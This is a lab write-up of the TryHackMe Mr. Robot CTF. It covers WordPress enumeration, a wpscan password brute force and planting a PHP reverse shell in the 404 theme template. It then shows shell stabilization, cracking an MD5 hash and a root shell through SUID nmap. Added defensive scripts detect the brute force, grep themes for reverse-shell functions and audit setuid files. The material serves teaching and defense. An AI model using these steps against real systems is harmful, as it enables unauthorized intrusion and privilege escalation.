Mr. Robot CTF Write-up: TryHackMe

Hello! This is my first write-up. I decided to start with a CTF based on one of my favorite shows; I hope you enjoy it!
This CTF is from TryHackMe, and it is rated as a medium-difficulty challenge.

An illustrative image from the Mr. Robot show.

1. Enumeration

Well, let's get started. The first thing to do on every CTF is to figure out which ports are open on the target machine. I ran the following command:
$ nmap -sC -sV -T4 $IP -vv -oN common-ports

Screenshot of the first nmap scan.

It’s important to note that without the -p- option nmap scans only the 1000 most common ports. Scanning all 65535 ports can take a while, and for this machine in particular we don’t need to.

Since a web server is running, we can brute-force directory names and see which ones exist. To do so, run the following command:
$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster-initial

Gobuster directory brute-force

I got errors running this command with 30 threads, so I had to slow down to 10. The machine was also responding slowly and the scan was taking too long, so I cancelled it at about 2.5%.

From the results of the directory scan we can see some files related to WordPress. Let’s assume the server is running WordPress and start enumerating it. A tool made especially for this is wpscan; to view its help page, run wpscan -h.

Unfortunately, wpscan didn’t give us much interesting information, so let's enumerate manually. Most of the options listed on the main page are just part of the show and not useful for our objective.
There is some unusual content in /robots:

User-agent: *
fsocity.dic
key-1-of-3.txt

We found the first key! http://$IP/key-1-of-3.txt
The file fsocity.dic can be used later for a brute-force attack; let’s take a look at its contents.
$ wc fsocity.dic
858160 858160 7245381
That’s a lot of words. Most of the words in this file are not unique. We can sort the contents and use ‘uniq -u’ to remove all repeated words.
$ sort fsocity.dic | uniq -u > uniq-fsociety.dic

There's a big difference between the original and the deduplicated list. Now that we have a password wordlist specific to this challenge, let's work on finding a valid username.
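Added example (mine, not code from the write-up): the two deduplication commands side by side on a constructed six-word list that stands in for fsocity.dic. The point is a subtle one worth checking before you rely on a wordlist: `sort | uniq -u` prints only the lines that occur exactly once, so every word that was repeated in the original disappears from the output, whereas `sort -u` (or `sort | uniq`) keeps one copy of each distinct word. The two results are different lists, and a wordlist built with the wrong one may no longer contain the word you were counting on.

```shell
#!/bin/sh
# Added example (not from the write-up): compare `sort | uniq -u` with `sort -u`
# on a small constructed list that stands in for fsocity.dic.

# Constructed sample: fsociety appears 3 times, elliot twice, mrrobot once.
sample_wordlist() {
    printf '%s\n' fsociety elliot mrrobot fsociety elliot fsociety
}

# `uniq -u` keeps only lines that occur exactly once in the sorted input,
# so every word that was repeated is dropped entirely.
only_singletons() {
    sample_wordlist | sort | uniq -u
}

# `sort -u` (same result as `sort | uniq`) keeps one copy of every distinct
# word, which is what "remove the duplicates" usually means for a wordlist.
deduplicated() {
    sample_wordlist | sort -u
}

# Line count for a pipeline, with the padding some wc implementations add removed.
count_lines() {
    "$1" | wc -l | tr -d ' '
}

# Stand-alone run: show how different the three lists are.
echo "original: $(count_lines sample_wordlist) words"
echo "uniq -u:  $(count_lines only_singletons) words -> $(only_singletons | tr '\n' ' ')"
echo "sort -u:  $(count_lines deduplicated) words -> $(deduplicated | tr '\n' ' ')"
```

Against the real file the equivalent commands are `sort fsocity.dic | uniq -u` and `sort -u fsocity.dic`; compare their line counts with `wc -l` and you will see the same gap the sample shows.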

One of the most important things in pentesting is knowing your target. As our target is Mr. Robot themed, we can assume a valid username might be something like mrrobot, robot, fsociety or elliot: things related to the show.
After a few tries on /wp-login.php, a different error message showed up. WordPress reports an unknown username differently from a wrong password, so elliot seems to be a valid username!

Now we can use the dictionary we found to brute-force this login page. Tools like ‘hydra’ can do this, but since we are dealing with WordPress, I’ll use wpscan.
$ wpscan --url http://$IP -P uniq-fsociety.dic -U elliot

Valid password for elliot

Nice! Juicy credentials! Now we can log in as elliot.
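Added example from the defender's side, not part of the original write-up: the brute force above leaves a very recognizable trace in the web server's access log, a burst of POST requests to /wp-login.php from one client, typically ending in a 302 redirect once a password is accepted (a failed login re-renders the form with a 200). The log lines below are constructed (documentation IP ranges, made-up user agents) and the awk logic is mine; run it against a real Apache or nginx combined-format log and tune the threshold to your traffic.

```shell
#!/bin/sh
# Added example (not from the write-up): spot a wp-login.php brute force in an
# Apache-style "combined" access log. All log lines below are constructed.

LOGFILE="${TMPDIR:-/tmp}/wp-login-sample.log"   # assumed scratch path for the demo
cat > "$LOGFILE" <<'EOF'
198.51.100.23 - - [10/Oct/2023:13:55:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "scanner/1.0"
198.51.100.23 - - [10/Oct/2023:13:55:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "scanner/1.0"
198.51.100.23 - - [10/Oct/2023:13:55:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "scanner/1.0"
198.51.100.23 - - [10/Oct/2023:13:55:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "scanner/1.0"
203.0.113.7 - - [10/Oct/2023:13:56:10 +0000] "GET /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2023:13:57:00 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
EOF

# wp_login_bursts LOGFILE THRESHOLD -> "<ip> <count>" for each client that sent
# at least THRESHOLD POSTs to /wp-login.php. Failed logins come back as 200
# (the form is re-rendered); a 302 means WordPress accepted the credentials.
wp_login_bursts() {
    awk -v limit="$2" '
        $6 == "\"POST" && $7 == "/wp-login.php" { posts[$1]++ }
        END { for (ip in posts) if (posts[ip] >= limit) print ip, posts[ip] }
    ' "$1"
}

# first_success LOGFILE IP -> timestamp of the first 302 to a POST on
# /wp-login.php from IP, i.e. the request that carried the accepted password.
first_success() {
    awk -v ip="$2" '
        $1 == ip && $6 == "\"POST" && $7 == "/wp-login.php" && $9 == "302" {
            sub(/^\[/, "", $4); print $4; exit
        }
    ' "$1"
}

# Stand-alone run over the constructed log.
echo "clients with 3 or more login POSTs:"; wp_login_bursts "$LOGFILE" 3
echo "first accepted login from 198.51.100.23: $(first_success "$LOGFILE" 198.51.100.23)"
```

The legitimate user at 203.0.113.7 (one GET for the form, one POST, one 302) never crosses the threshold, while the guessing client does; the timestamp from the second function is where an incident responder starts looking at what that session did next.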

2. Initial shell

Following this article about WordPress shell upload, we can get a reverse shell. If you are using Kali, several web shells are stored in /usr/share/webshells:
$ cp /usr/share/webshells/php/php-reverse-shell.php .

Example PHP reverse shell

Do not forget to edit the IP and PORT fields. Use your tun0 address; you can find it with $ ifconfig.

In the WordPress dashboard, go to Appearance > Themes > Editor.
I chose 404.php, removed all the legitimate code and pasted the PHP reverse shell in its place.

Reverse shell inside 404 template.

I opened a netcat listener and browsed to a page that doesn't exist, which makes WordPress execute the 404 template, and boom! Got a shell.
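Added example, not from the original post: two checks a WordPress administrator can run to close the path just used. The theme editor is only there because file editing is allowed; defining DISALLOW_FILE_EDIT as true in wp-config.php removes Appearance > Editor from the dashboard. The second check greps theme templates for functions a template should never call (sockets, process spawning, eval). Everything under $WP, including the theme name and the marker lines in the fake 404.php, is constructed for the demo; point WP at the real WordPress root to use it.

```shell
#!/bin/sh
# Added example (not from the write-up): WordPress hardening checks, run here
# against a constructed install under $WP.

WP="${TMPDIR:-/tmp}/wp-demo"               # assumed scratch path for the demo
THEME="$WP/wp-content/themes/demo-theme"   # constructed theme name
mkdir -p "$THEME"

# Constructed wp-config.php with no file-editor lock, as on a default install.
printf "<?php\ndefine('DB_NAME', 'wordpress');\n" > "$WP/wp-config.php"

# Constructed 404.php carrying the calls a PHP reverse shell is built from
# (marker lines only, not a working payload), next to a harmless template.
cat > "$THEME/404.php" <<'EOF'
<?php
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', $spec, $pipes);
EOF
printf '<?php get_header(); ?>\n<h1>Not found</h1>\n<?php get_footer(); ?>\n' > "$THEME/index.php"

# file_editor_disabled WP_ROOT -> success when wp-config.php defines
# DISALLOW_FILE_EDIT as true, which removes Appearance > Editor from the dashboard.
file_editor_disabled() {
    grep -Eq "define\([[:space:]]*'DISALLOW_FILE_EDIT'[[:space:]]*,[[:space:]]*true[[:space:]]*\)" \
        "$1/wp-config.php"
}

# suspicious_theme_files WP_ROOT -> theme PHP files calling functions that open
# sockets, spawn processes or evaluate code; none of these belong in a template.
suspicious_theme_files() {
    find "$1/wp-content/themes" -name '*.php' -exec grep -lE \
        '(^|[^[:alnum:]_])(fsockopen|proc_open|shell_exec|passthru|popen|exec|system|eval)[[:space:]]*\(' {} + \
        | sort
}

# Stand-alone run against the constructed install.
if file_editor_disabled "$WP"; then echo "file editor: disabled"; else echo "file editor: ENABLED"; fi
echo "suspicious theme files:"; suspicious_theme_files "$WP"
```

The grep is a triage aid, not a verdict: a hit means read the file, and a clean run does not prove the theme is untouched (obfuscated code evades name matching), which is why the first check, removing the editor entirely, matters more than the second.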

2.1 Netcat shell stabilization

Netcat shells aren’t stable by default, so we need a few manual steps to stabilize one. First things first, let's check which Python interpreter is available on the target machine with $ which python (it may be python, python2 or python3).
Command to spawn a proper shell through a pty:
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
Command to set the TERM variable so that commands like clear work:
$ export TERM=xterm
Now put the shell in the background with Ctrl + Z and type:
$ stty raw -echo; fg
Press Enter two or three times and… welcome, stable shell!

Netcat shell stabilization process

3. Horizontal privilege escalation

We got a shell as the daemon user, and our objective is to completely own this machine, so let's work on getting a more privileged account. In /home there is another user called ‘robot’; let's go after that account.
Robot's password is stored in a world-readable file as an MD5 hash. Since MD5 is a fast hash that cracks easily, we can crack it locally with tools like hashcat or john, or use a website like crackstation.net (shown in the screenshot below).

Screenshot from crackstation.net

Alright, we can log in as robot.
$ su robot
The second key is in robot’s home directory and is readable by that user.

4. Vertical privilege escalation

As we have robot’s password, let's run $ sudo -l to see whether robot can run any command as root. And… no, unfortunately.
Let's search for binaries with the SUID bit set. Run the command:
$ find / -perm -4000 2>/dev/null
nmap is on the list, which is unusual. A quick Google search turned up this article about nmap with SUID. It seems we can run nmap interactively and get a shell as root. Fancy!
$ nmap --interactive
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
The third key is stored in /root.
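Added example covering both privilege-escalation findings above (the world-readable password file in section 3 and the unexpected SUID nmap in section 4), written from the auditing side and not part of the original write-up. It builds a fake filesystem root under $ROOT with constructed files and modes, then runs the two checks a hardening script would run for real against /: setuid files that are not on a known-good baseline, and files in home directories that any local user can read. The paths, the baseline list and the file contents are all constructed.

```shell
#!/bin/sh
# Added example (not from the write-up): local audit for the two weaknesses
# found on the box, run here against a constructed root under $ROOT.

ROOT="${TMPDIR:-/tmp}/audit-demo"          # assumed scratch path for the demo
mkdir -p "$ROOT/usr/bin" "$ROOT/bin" "$ROOT/home/robot"

# Constructed binaries: the first three are expected setuid programs, nmap is
# the odd one out, ls is a normal non-setuid file.
for b in usr/bin/passwd usr/bin/sudo bin/su usr/bin/nmap usr/bin/ls; do
    : > "$ROOT/$b"
done
chmod 4755 "$ROOT/usr/bin/passwd" "$ROOT/usr/bin/sudo" "$ROOT/bin/su" "$ROOT/usr/bin/nmap"
chmod 0755 "$ROOT/usr/bin/ls"

# Constructed home directory: a credential file readable by everyone next to a
# file that is correctly restricted to its owner.
printf 'robot:<constructed-md5-placeholder>\n' > "$ROOT/home/robot/creds.txt"
chmod 0644 "$ROOT/home/robot/creds.txt"
printf 'not a real key\n' > "$ROOT/home/robot/key-2-of-3.txt"
chmod 0600 "$ROOT/home/robot/key-2-of-3.txt"

# Known-good setuid programs for this host, relative to the audited root.
# In practice generate this from a clean image and keep it in version control.
SUID_BASELINE="usr/bin/passwd
usr/bin/sudo
bin/su"

# list_suid ROOT -> every setuid regular file under ROOT, relative and sorted
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sed "s|^$1/||" | sort
}

# unexpected_suid ROOT -> setuid files that are not on the baseline
unexpected_suid() {
    baseline="${TMPDIR:-/tmp}/audit-demo-baseline.txt"
    printf '%s\n' "$SUID_BASELINE" | sort > "$baseline"
    list_suid "$1" | comm -23 - "$baseline"
}

# world_readable_home ROOT -> files under home/ that any local user can read
world_readable_home() {
    find "$1/home" -type f -perm -o=r 2>/dev/null | sed "s|^$1/||" | sort
}

# Stand-alone run against the constructed root.
echo "setuid files not on the baseline:"; unexpected_suid "$ROOT"
echo "world-readable files in home directories:"; world_readable_home "$ROOT"
```

Both findings are exactly what this box handed out: a setuid binary that has no business being setuid, and a secret sitting in a file with mode 644. Run against a real host the same two functions make a cheap periodic check, with the baseline diff being the part that catches a newly added setuid bit rather than just listing the usual suspects.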

5. Conclusion

Although this machine is more CTF-like, a few situations in it could appear in real life (the wp-login error message, for one). I had a lot of fun doing this box, and the creator’s effort to make a good machine is evident.
Thank you for your attention!
